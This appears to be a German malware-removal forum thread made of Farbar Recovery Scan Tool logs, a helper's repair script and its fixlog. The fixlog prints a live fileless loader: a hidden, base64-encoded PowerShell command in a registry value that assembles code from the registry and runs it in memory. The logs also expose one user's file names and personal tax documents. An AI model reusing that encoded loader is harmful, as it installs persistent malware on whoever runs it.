HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Run: [Screenpresso] => C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\Screenpresso.exe [18398304 2021-01-09] (Learnpulse -> Learnpulse)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Run: [HP OfficeJet Pro 7740 (NET)] => C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe [3770504 2018-04-06] (Hewlett Packard -> HP Inc.)

HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)

HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

Startup: C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Laufwerke.bat [2019-01-27] () [Datei ist nicht signiert]
 

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

Task: {08177AF7-895C-4CDE-BB61-C67AFF7D9DED} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

Task: {1110DE16-C375-4BCA-B72F-AF617B0D8FFC} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [116584 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)

Task: {12C84621-CAA5-4F59-9214-474125FF1AE5} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-19] (Microsoft Corporation -> Microsoft Corporation)

Task: {19520EC2-6F12-4753-9C89-63BFAACB92B5} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [116584 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)

Task: {2AC510A4-884D-4FFB-9DD3-0C03B2C19EFE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-17] (Google Inc -> Google Inc.)

Task: {62E7827E-C7E1-4C4E-8B46-FF865E056192} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)

Task: {76D7BBAC-71A9-42F5-AF51-1E7C1279F625} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-19] (Microsoft Corporation -> Microsoft Corporation)

Task: {7F233437-8600-49D7-858A-20C54C7C6662} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-17] (Google Inc -> Google Inc.)

Task: {81A5CFF9-F6A7-420D-9945-4DA1E902C9A6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

Task: {9144CA0D-EED9-468E-8BEF-2311B88B92EC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

Task: {D67B4130-3DDC-43C9-B002-8ABDC0AB5DD0} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [1149336 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)

Task: {DE27C544-B106-4C7D-9BF3-78CA0EA1F81A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
 
 

==================== Internet (Nicht auf der Ausnahmeliste) ====================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
 

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)

Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1

Tcpip\..\Interfaces\{379cb8d3-10a1-4062-b840-8afb6c84784b}: [DhcpNameServer] 192.168.10.1

Tcpip\..\Interfaces\{4cec849f-a057-45bf-a346-ef6290670ce0}: [NameServer] 192.168.10.1

Tcpip\..\Interfaces\{8d46b3e8-e3e4-4d57-9ac0-d4bf3d80561a}: [DhcpNameServer] 192.168.1.250

Tcpip\..\Interfaces\{d94cdd1b-4d3b-485d-8a86-23879c01e60c}: [DhcpNameServer] 192.168.178.1

Tcpip\..\Interfaces\{fb4f79cc-731d-4165-b863-585f13ab9b6f}: [DhcpNameServer] 192.168.178.1
 

Edge: 

======

DownloadDir: C:\Users\buskr5\Downloads

Edge DefaultProfile: Default

Edge Profile: C:\Users\buskr5\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-07]

Edge DownloadDir: C:\Users\buskr5\Downloads

Edge StartupUrls: Default -> "hxxp://google.de/"
 

FireFox:

========

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)
 

Chrome: 

=======

CHR DefaultProfile: Default

CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default [2021-01-09]

CHR Extension: (Adblock Plus - kostenloser Adblocker) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2020-12-15]

CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]

CHR Extension: (Chrome Media Router) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-08]

CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-07]

CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1 [2021-01-07]

CHR Extension: (Präsentationen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-11-09]

CHR Extension: (Docs) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2020-11-09]

CHR Extension: (Google Drive) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-11-09]

CHR Extension: (YouTube) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-11-09]

CHR Extension: (Tabellen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-11-09]

CHR Extension: (Google Docs Offline) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-11-09]

CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-11-09]

CHR Extension: (Google Mail) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-11-09]

CHR Extension: (Chrome Media Router) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-11-09]

CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-07]
 

==================== Dienste (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)

R2 ApHidMonitorService; C:\Program Files\Apoint2K\HidMonitorSvc.exe [105240 2017-10-12] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2020-05-20] (Apple Inc. -> Apple Inc.)

R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [9105800 2020-12-01] (Microsoft Corporation -> Microsoft Corporation)

R2 DATEV Sicherheitspaket-Basis-Dienst; C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHostService.exe [408592 2020-10-20] (DATEV eG 08 2 -> DATEV eG)

S3 FBIOSDRVService; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\fbiosdrv-service.exe [130200 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R2 Fuj02e3DriverUtilityService; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3-utility.exe [177432 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R2 iked; C:\Program Files\ShrewSoft\VPN Client\iked.exe [1127736 2013-07-01] (Shrew Soft Inc -> )

R2 ipsecd; C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe [810808 2013-07-01] (Shrew Soft Inc -> )

S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5197552 2020-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)

R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [12720144 2020-11-18] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
 

===================== Treiber (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

S3 dlcdcncm; C:\WINDOWS\System32\drivers\dlcdcncm62_x64.sys [92400 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)

S3 dlusbaudio; C:\WINDOWS\system32\DRIVERS\dlusbaudio_x64.sys [238320 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)

R3 FBIOSDRV; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\FBIOSDRV.sys [43672 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R3 fuj02e3; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3.sys [59672 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R3 GabiAcpi; C:\WINDOWS\System32\drivers\GabiAcpi.sys [40488 2020-07-15] (FUJITSU CLIENT COMPUTING LIMITED -> Fujitsu Technology Solutions)

U5 KOBCCID; C:\Windows\System32\Drivers\KOBCCID.sys [116864 2019-01-16] (KOBIL Systems GmbH) [Datei ist nicht signiert]

S3 KobilCcid; C:\WINDOWS\System32\drivers\KobilCcid_x64.sys [50432 2019-10-21] (KOBIL Systems GmbH -> KOBIL Systems GmbH)

S3 USBAAPL64; C:\WINDOWS\System32\Drivers\usbaapl64.sys [54784 2020-05-06] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)

S4 usbrndis6; C:\WINDOWS\System32\drivers\usb80236.sys [24064 2019-12-07] (Microsoft Corporation) [Datei ist nicht signiert]

R1 vflt; C:\WINDOWS\system32\DRIVERS\vfilter.sys [24064 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)

S3 vnet; C:\WINDOWS\System32\drivers\virtualnet.sys [17408 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)

S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)

S3 WDC_SAM; C:\WINDOWS\System32\drivers\wdcsam64.sys [35584 2018-02-26] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)

R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
 

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 
 

==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
 

2021-01-09 18:12 - 2021-01-09 18:13 - 000032867 _____ C:\Users\buskr5\Downloads\Addition.txt

2021-01-09 18:10 - 2021-01-09 18:22 - 000019183 _____ C:\Users\buskr5\Downloads\FRST.txt

2021-01-09 18:10 - 2021-01-09 18:10 - 002281472 _____ (Farbar) C:\Users\buskr5\Downloads\FRST64.exe

2021-01-09 15:44 - 2021-01-09 15:44 - 000000000 ____D C:\WINDOWS\system32\appmgmt

2021-01-09 15:27 - 2021-01-09 15:27 - 000000000 ____D C:\Users\ITMueller\AppData\Local\PeerDistRepub

2021-01-09 15:09 - 2021-01-09 15:16 - 000031957 _____ C:\Users\ITMueller\Downloads\Addition.txt

2021-01-09 15:07 - 2021-01-09 15:16 - 000026221 _____ C:\Users\ITMueller\Downloads\FRST.txt

2021-01-09 15:05 - 2021-01-09 18:21 - 000000000 ____D C:\FRST

2021-01-09 15:05 - 2021-01-09 15:05 - 002282496 _____ (Farbar) C:\Users\ITMueller\Downloads\FRST64.exe

2021-01-09 15:03 - 2021-01-09 15:03 - 000000000 ____D C:\Users\ITMueller\Desktop\Verkn

2021-01-09 15:03 - 2021-01-09 15:03 - 000000000 ____D C:\Users\ITMueller\AppData\Roaming\Apple Computer

2021-01-09 15:02 - 2021-01-09 15:03 - 000000000 ____D C:\Users\ITMueller\AppData\Local\Intel

2021-01-07 19:12 - 2021-01-07 19:12 - 000024546 _____ C:\Users\buskr5\Documents\bookmarks_07.01.21.html

2021-01-07 19:11 - 2021-01-07 19:11 - 000048978 _____ C:\Users\buskr5\Documents\cc_20210107_191149.reg

2021-01-07 19:09 - 2021-01-07 19:10 - 000000000 ____D C:\Users\buskr5\Downloads\ccsetup575

2021-01-07 18:52 - 2021-01-07 18:59 - 000000000 ____D C:\AdwCleaner

2021-01-05 09:49 - 2021-01-05 09:49 - 000012437 _____ C:\Users\buskr5\Downloads\Werkdienstwohnung-Werkmietwohnung.pdf

2020-12-21 10:10 - 2020-12-21 10:10 - 000345367 _____ C:\Users\buskr5\Downloads\LRA-WM_ZS_Was_braucht_man_wann_zur_Zulassung_10-2019.pdf

2020-12-21 10:10 - 2020-12-21 10:10 - 000013851 _____ C:\Users\buskr5\Downloads\Erklärung_an_Eides_Statt.pdf

2020-12-21 10:09 - 2020-12-21 10:09 - 000280628 _____ C:\Users\buskr5\Downloads\SEPA_Kombimandat.pdf

2020-12-21 10:04 - 2020-12-21 10:04 - 000020116 _____ C:\Users\buskr5\Downloads\Vollmacht (1).pdf

2020-12-17 08:20 - 2020-12-17 08:20 - 000000000 ____D C:\Users\buskr5\Documents\Lea Schule

2020-12-14 12:10 - 2020-12-14 12:10 - 000196173 _____ C:\Users\buskr5\Desktop\untermietvertrag-mustervorlage-word-pdf.pdf

2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner (3)

2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Isi

2020-12-10 08:55 - 2020-12-10 08:55 - 000427266 _____ C:\Users\buskr5\Downloads\Krieger Handelsbericht 2019 (1).pdf

2020-12-10 08:50 - 2020-12-10 08:50 - 000336734 _____ C:\Users\buskr5\Downloads\ESt Krieger, Roland 2019.pdf

2020-12-10 08:47 - 2020-12-10 08:47 - 000427266 _____ C:\Users\buskr5\Downloads\Krieger Handelsbericht 2019.pdf

2020-12-10 08:47 - 2020-12-10 08:47 - 000199415 _____ C:\Users\buskr5\Downloads\Krieger Steuerbericht 2019.pdf

2020-12-10 08:45 - 2020-12-10 08:45 - 000140074 _____ C:\Users\buskr5\Downloads\GewSt Krieger Roland 2019.pdf
 

==================== Ein Monat (geänderte) ==================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
 

2021-01-09 18:21 - 2018-12-17 10:52 - 000000000 __SHD C:\Users\buskr5\IntelGraphicsProfiles

2021-01-09 18:20 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness

2021-01-09 18:20 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft

2021-01-09 18:20 - 2018-12-17 10:05 - 000000000 __SHD C:\Users\ITMueller\IntelGraphicsProfiles

2021-01-09 18:17 - 2018-12-19 09:09 - 000000000 ____D C:\01_Laufwerke

2021-01-09 17:55 - 2020-07-16 07:55 - 000000000 ____D C:\WINDOWS\system32\SleepStudy

2021-01-09 16:01 - 2018-12-18 08:26 - 000002350 _____ C:\Users\buskr5\Desktop\INCOGNITO.lnk

2021-01-09 15:48 - 2018-12-17 10:52 - 000000000 ____D C:\Users\buskr5\AppData\Local\ConnectedDevicesPlatform

2021-01-09 15:44 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF

2021-01-09 15:44 - 2018-12-19 10:28 - 000000000 ____D C:\Program Files (x86)\InstallShield Installation Information

2021-01-09 15:36 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps

2021-01-09 15:19 - 2018-12-17 09:52 - 000000000 ____D C:\Users\ITMueller\AppData\Local\Packages

2021-01-09 15:18 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog

2021-01-09 15:04 - 2020-07-16 08:02 - 000003368 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-4192198180-2913720414-2796424460-1001

2021-01-09 15:04 - 2020-07-15 21:58 - 000002395 _____ C:\Users\ITMueller\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk

2021-01-09 15:04 - 2018-12-17 09:54 - 000000000 ___RD C:\Users\ITMueller\OneDrive

2021-01-09 15:03 - 2018-12-17 11:01 - 000000000 ____D C:\Users\ITMueller\AppData\Local\Adobe

2021-01-09 15:02 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel

2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 __RHD C:\Users\Public\AccountPictures

2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 ___RD C:\Users\ITMueller\3D Objects

2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 ____D C:\Users\ITMueller\AppData\Local\ConnectedDevicesPlatform

2021-01-09 15:01 - 2020-06-16 05:58 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk

2021-01-07 17:24 - 2020-07-16 08:03 - 001632020 _____ C:\WINDOWS\system32\PerfStringBackup.INI

2021-01-07 17:24 - 2019-12-07 15:51 - 000707136 _____ C:\WINDOWS\system32\perfh007.dat

2021-01-07 17:24 - 2019-12-07 15:51 - 000142394 _____ C:\WINDOWS\system32\perfc007.dat

2021-01-07 17:17 - 2020-12-07 10:38 - 000000000 ____D C:\Program Files (x86)\TeamViewer

2021-01-07 17:17 - 2020-07-16 08:02 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT

2021-01-07 17:17 - 2020-07-16 07:55 - 000008192 ___SH C:\DumpStack.log.tmp

2021-01-07 17:17 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState

2021-01-07 17:17 - 2019-12-07 10:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI

2021-01-07 07:23 - 2018-12-17 10:52 - 000000000 ____D C:\Users\buskr5\AppData\Local\Packages

2021-01-07 07:21 - 2018-12-17 17:20 - 000002293 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

2021-01-05 12:52 - 2018-12-20 11:36 - 000002248 ____H C:\Users\buskr5\Documents\Default.rdp

2021-01-05 12:41 - 2019-12-07 15:52 - 000000000 ____D C:\WINDOWS\system32\FxsTmp

2021-01-05 12:04 - 2019-04-30 07:26 - 000031577 _____ C:\Users\buskr5\Desktop\Monatliche Abzüge.xlsx

2020-12-28 09:55 - 2019-11-12 09:00 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner

2020-12-27 10:42 - 2018-12-17 10:24 - 000000000 ____D C:\Program Files (x86)\Microsoft Office

2020-12-17 12:50 - 2020-07-16 08:02 - 000003362 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-4192198180-2913720414-2796424460-1002

2020-12-17 12:50 - 2020-07-15 21:58 - 000002386 _____ C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk

2020-12-17 12:50 - 2018-12-17 10:54 - 000000000 ___RD C:\Users\buskr5\OneDrive

2020-12-16 11:01 - 2018-12-17 10:54 - 000000000 ____D C:\Users\buskr5\AppData\Local\PlaceholderTileLogoFolder

2020-12-14 08:49 - 2018-12-17 11:06 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

2020-12-10 09:12 - 2019-09-16 11:29 - 000000000 ___RD C:\Users\buskr5\Desktop\Schulkinder
 

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========
 

2019-01-16 11:54 - 2019-01-16 11:54 - 000000463 _____ () C:\Users\buskr5\AppData\Local\belegtransfer_setup.log
 

==================== SigCheck ============================
 

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
 

==================== Ende von FRST.txt ========================

Scripting/Repair mit FRST64

Kopiere den gesamten Inhalt der folgenden Code-Box:

Code:

Start:: cmd: reg query "HKCU\Environment" cmd: reg query "HKCU\Software" cmd: netsh advfirewall reset emptytemp: End::
Starte nun FRST und klicke direkt den Reparieren Button.Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
Gegebenenfalls muss dein Rechner neu gestartet werden.
Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Code:

Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021

durchgeführt von buskr5 (10-01-2021 00:41:03) Run:1

Gestartet von C:\Users\buskr5\Downloads

Geladene Profile: buskr5

Start-Modus: Normal

==============================================
 

fixlist Inhalt:

*****************

cmd: reg query "HKCU\Environment"

cmd: reg query "HKCU\Software"

cmd: netsh advfirewall reset

emptytemp:
 

*****************
 
 

========= reg query "HKCU\Environment" =========
 
 

HKEY_CURRENT_USER\Environment

    Path    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;

    TEMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp

    TMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp

    OneDrive    REG_EXPAND_SZ    C:\Users\buskr5\OneDrive

    buskr5    REG_SZ    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"                       -windowstyle hidden  -En "PAAjACAAYgBuAHkAegBxAHkAaAB2AGIAeAAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "                      
 
 

========= Ende von CMD: =========
 
 

========= reg query "HKCU\Software" =========
 
 

HKEY_CURRENT_USER\Software\Adobe

HKEY_CURRENT_USER\Software\Alps

HKEY_CURRENT_USER\Software\AppDataLow

HKEY_CURRENT_USER\Software\Apple Computer, Inc.

HKEY_CURRENT_USER\Software\Apple Inc.

HKEY_CURRENT_USER\Software\BEDI_BelegTransfer

HKEY_CURRENT_USER\Software\buskr5

